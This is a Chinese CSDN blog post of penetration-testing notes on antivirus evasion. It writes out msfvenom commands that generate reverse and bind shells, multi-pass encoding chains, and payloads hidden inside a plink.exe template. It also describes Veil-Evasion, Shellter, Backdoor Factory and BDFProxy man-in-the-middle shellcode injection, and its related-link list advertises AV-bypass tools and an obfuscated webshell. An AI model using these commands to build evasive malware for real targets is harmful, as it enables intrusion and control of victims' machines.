渗透测试-----10-免杀

最新推荐文章于 2024-04-10 11:24:50 发布
最新推荐文章于 2024-04-10 11:24:50 发布
阅读量254 收藏
点赞数
文章标签: 测试工具 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62693307/article/details/128881696
版权

免杀

恶意程序最主要的防护手段

杀毒软甲/防病毒软件

客户端/服务器/邮件防病毒

检测原理

基于二进制文件中特征签名的黑名单检测方法

基于行为的分析方法(启发式)

修改二进制文件中的特征字符

替换、擦除、修改

加密技术

通过加密使得特征字符不可读,从而逃避AV检测

运行时分片分段的解密执行,注入进程火AV不检查的无害文件中

防病毒软件的检测

而已程序本身的特征字符

加密器crypter的特征字符

RAT软件

远程访问特洛伊木马是一种恶意软件,能够让黑客监视和控制您的计算机、网络设备甚至整个网络

生成反弹shell

msfvenom -pwindows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --

platform win -f exe -o a.exe

加密编码反弹shell

msfvenom -pwindows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e

x86/shikata_ga_nai -i 5 | msfvenom -a x86--platform windows -e x86/

countdown -i 8 -f raw | msfvenom -a x86--platform windows -e x86/

shikata_ga_nai -i 9 -b '\x00' -f exe -oa.exe

引用模板隐藏shell

msfvenom -p windows/shell_reverse_tcp -x/usr/share/windows-binaries/

plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -oa.exe

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/

plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86--

platform win -f exe > b.exe

Veil-evasion(Veil-framework框架的一部分)

由python语言编写

用于自动生成免杀

集成msf paypload,支持自定义payload

集成各种注入技术

集成各种第三方工具

Hypersion、PEScrambler、BackDoor Factory

继承各种开发打包运行环境

python:pyinstaller/py2exe

c#:mono for.NET

c:mingw32

安装

apt-get install veil-evasion

如何使用

Veil-Evasion下载、安装、使用教程 - 付杰博客 (fujieace.com)

传统防病毒查杀原理

  • 查找文件体重特殊字符串,匹配规则查杀

找到触发AV查杀的精确字符串,并将其修改

  • 将执行程序分片成很多小片段

  • 将包含MZ头的第一个片段与后续片段依次组合后交给AV查杀

  • 重复以上步骤,最终精确定位出

shellter(免杀工具)

kali 免杀工具shellter安装以及使用 -We3sT - 博客园 (cnblogs.com)

代码混淆

定制的编码方式

多态编码

集成部分msf payload

目前只支持32为PE程序

使用正常的exe文件作为模板,将payload代码加入模板内

模板程序的功能将失效

Backdoor-factory(后门工具)

backdoor-factory是一款后门构建工具。与其他工具不同的是,他不会增加软件的大小,而是利用代码缝隙进行注入,免杀效果更好。

backdoor-factory详细使用教程_星落.的博客-CSDN博客_backdoor-factory

Bdfproxy

Kalilinux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21_思源湖的鱼的博客-CSDN博客_bdfproxy

  • 集成mitmproxy

  • 基于流量劫持(中间人攻击)动态注入shellcode(ARP spoof、DNSspoof、Fake AP)

  • 启动路由功能进行流量劫持

  • 代理端口是8080,故把所有流量都转到8080端口

  • 启动bdfproxy,使得shell反弹

孤寂204
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族中,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决数据如何在网络中传输,而Socket则是对TCP/IP的封装和应用。 TCP是网络中的规则,是不能修改的,而Socket则是给程序员使用的,是可以任意使用的。 Socket常称作“套接字”,用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同虚拟机或不同计算机之间的通信。 简介 在python中,使用Socket进行编程的时候,需要先实例
浅谈MSF渗透测试
02-24
渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
Golang-Gin 框架写的平台,内置分离、捆绑等多种BypassAV方式
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
04-10 837
第一个文件选择木马(木马.exe),第二个文件选择要捆绑的文件(如pdf等)点击生成目前火绒、360、卡巴斯基、def全过;先这样用,不能bypass了再说,更新频率看star数量。
Kali Linux 高级渗透测试(原书第2版)(带详细目录)
06-18
KaliLinux面向专业的渗透测试和安全审计,集成了大量精心挑选的安全检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“链”采取的具体步骤。通过阅读本书读者能快速学习并掌握渗透测试方法和工具。
Tide安全团队绕过教程
11-12
Tide安全团队绕过教程,内含培训PDF,安全团队编写的脚本和工具
PHP过D盾小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
BDFProxy-ng:重写BDFProxy(https
05-23
#The Backdoor Factory Proxy NextGen(BDFProxy-ng)v0.1 bdfproxy-ng是一个分支并回顾了原始BDFProxy( ) ##什么是新的 添加了对deb文件的支持(Debian和Ubuntu) 增加了对ar和xz存档的支持 增加了对mime类型而不是标头的支持 摆脱了各种库来处理不同的存档类型,只支持一种( libarchive-c ) 重构代码,添加更强大的检查 更改了版权:现在是GPL3! ##为什么要分叉,我觉得代码需要进行适当的重新设计才能添加更多功能。 另外,我不喜欢原始项目的版权:) ##如何安装您需要安装requirements.txt列出的python软件包(提示: sudo pip install -r requirements.txt )。 在此之前,您需要从数据包管理器中安装libarchive-dev
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 3844
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
生命在于学习——
易水哲的博客
10-25 2120
一些的知识,没有实操。
简单介绍
qq_38675102的博客
01-05 2638
简单介绍
【转】基础 -技术及原理
tpriwwq的专栏
05-03 2012
的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其原有功能的情况下,破坏了病毒与木马所固有的特征,一次就能完成。
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
weixin_43287317的博客
03-28 5999
Kali实现msfvenom在Windows和Linux靶机下后门漏洞
msf的实战使用——msfvenom
tomyyyyy
05-11 2855
msf的实战使用——msfvenom 文章目录msf的实战使用——msfvenommsfvenom命令的参数常用命令木马姿势1:Py2exe生成exe姿势2:PyInstaller生成exe姿势3:编译c源码 msfvenom命令的参数 Options: -l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt,
MSF(六):后渗透
1stPeak's Blog
02-21 4972
渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444...
kali linux下的嗅探工具介绍
weixin_33893473的博客
03-11 810
最近在研究局域网的中间人***、嗅探***,把kali linux下安装的几款嗅探工具调研了下,下面分别介绍下,以便于以后使用。bdfproxy :全称backdoor factory proxy,此工具中文资料很少,基本没有搜到,搜到https://hackmag.com/security/bdfproxy/和https://github.com/secretsquirr...
】木马制作
qq_48201589的博客
03-25 1239
就是指能够使病毒木马逃避毒软件检测的一种技术。总体来讲,分为静态和动态,静态基于特征值,而动态则是基于行为。这里我们讲Cobalt Strike生成Python木马,绕过火绒。
远控从入门到实践
混子
01-23 5984
前几天突然看到一个大佬写的,就极其好奇,于是乎就看到这个大佬写的并学习,把之前不懂的地方也都整明白了,特别感谢白师傅和卓师傅,这篇文章主要是远控
常见的几种方法
路虽远,行将至。事虽难,做必达。
03-05 6394
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18 1、自编码 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe 开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用 微步沙箱检测结果,检出率近一半,效果一般 ​​​ ...
入门(基础理论)
NZXHJ的博客
09-14 2729
入门的理论相关学习笔记
2020网络安全-web渗透测试-2 下载 老男孩
08-16
在网络安全领域中,"web渗透测试"是指通过模拟攻击的方式,评估网站和应用程序的安全性,以发现潜在的漏洞和弱点。而"下载"是指从互联网上获取、复制或存储文件到本地设备的行为。 因此,根据我们的理解,您可能指...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值